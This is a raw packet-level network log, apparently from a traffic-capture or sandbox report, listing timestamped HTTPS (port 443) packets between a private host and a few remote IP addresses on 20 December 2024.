                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.438210964 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.438292980 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.448884964 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.449007034 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.449147940 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.464732885 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.464845896 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.464934111 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.464931011 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.464994907 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.465195894 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.465261936 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.478944063 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479192972 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479275942 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479473114 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479599953 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479615927 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479733944 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.479826927 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.480139971 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.480200052 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.480273008 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.482300997 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.482330084 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489164114 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489203930 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489636898 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489648104 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489674091 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489753962 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489815950 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489846945 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489897013 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.489928961 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.490035057 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.490089893 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.490248919 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.490350008 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.490364075 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.499485970 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.499500990 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.499871969 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.499897003 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.502137899 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.503880024 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.503894091 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.532399893 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.550374985 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.550390959 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.597687006 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.609064102 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.609318018 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.609395027 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.645185947 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.645215034 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.645569086 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.645672083 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.645862103 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.659753084 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.659898043 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.660166979 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.660269022 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.674137115 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.674179077 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.684154034 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.684180975 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.685978889 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.686001062 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.686228037 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.688797951 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.688815117 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.717341900 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.717426062 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.717957020 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.718381882 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.718416929 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.727072954 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.727303982 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.727440119 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.727830887 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.727858067 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.728241920 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.728307009 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.728373051 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.728717089 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.728749990 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.802285910 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.802548885 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.802614927 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.803639889 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.803662062 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.804168940 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.804214954 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.804271936 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.804543972 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.804560900 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.810498953 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.810750961 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.810919046 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811181068 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811199903 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811494112 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811573982 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811644077 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811917067 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.811949968 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.849178076 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.849267006 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.849342108 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.849400997 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850039959 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850064039 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850403070 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850435972 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850492001 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850812912 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.850830078 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.996295929 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.996541977 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.996591091 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.997680902 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.998048067 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.998163939 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.998178959 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.998225927 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.042781115 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441437006 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441557884 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441622972 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441646099 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441672087 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441864014 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441889048 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441915035 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.441968918 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.449094057 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.451611042 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.451848030 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.451860905 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.452943087 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.453373909 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.453435898 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.453440905 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.453550100 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.457595110 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.457655907 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.457672119 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.472182989 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.472388029 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.472426891 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.473514080 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.473829031 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.473937988 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.473951101 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.474009991 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.507988930 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.508003950 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.508034945 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.523987055 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.556057930 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.560781956 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.603204966 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.603219986 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.636961937 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.637053013 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.637063026 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.637087107 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.637145996 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.645075083 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.653311968 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.653495073 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.653553963 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.653568983 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.655875921 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.662313938 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.670309067 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.670989037 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.671005964 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.679565907 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.679635048 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.679647923 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.687474966 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.687578917 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.687592030 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.699187994 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.699553967 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.699603081 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.700706005 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.701033115 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.701163054 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.701174974 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.701219082 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.703716993 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.703778982 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.703790903 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.703949928 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704216003 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704277039 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704412937 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704458952 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704792023 CET49904443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704853058 CET44349904141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.704938889 CET49904443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.705444098 CET49904443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.705471039 CET44349904141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.714282990 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.714545965 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.714574099 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.715738058 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.716047049 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.716116905 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.716150045 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.743580103 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.758909941 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.758929014 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.829231024 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.829691887 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.829705954 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.831382990 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.831531048 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.832528114 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.832603931 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.832798958 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.832807064 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.882821083 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.889125109 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.889374971 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.889424086 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.893023968 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.893131971 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.893392086 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.893505096 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.893517971 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.893573046 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.898600101 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.898719072 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.898793936 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.898802996 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.898929119 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.900351048 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.900351048 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.900614023 CET49905443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.900677919 CET44349905141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.902549028 CET49905443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.902717113 CET49905443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.902746916 CET44349905141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.905025005 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.905267000 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.905284882 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.908845901 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.908916950 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.909182072 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.909276962 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.909288883 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.909363985 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.925601006 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.925849915 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.926502943 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.926779032 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.926809072 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.926948071 CET49906443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.926997900 CET44349906141.193.213.11192.168.2.4
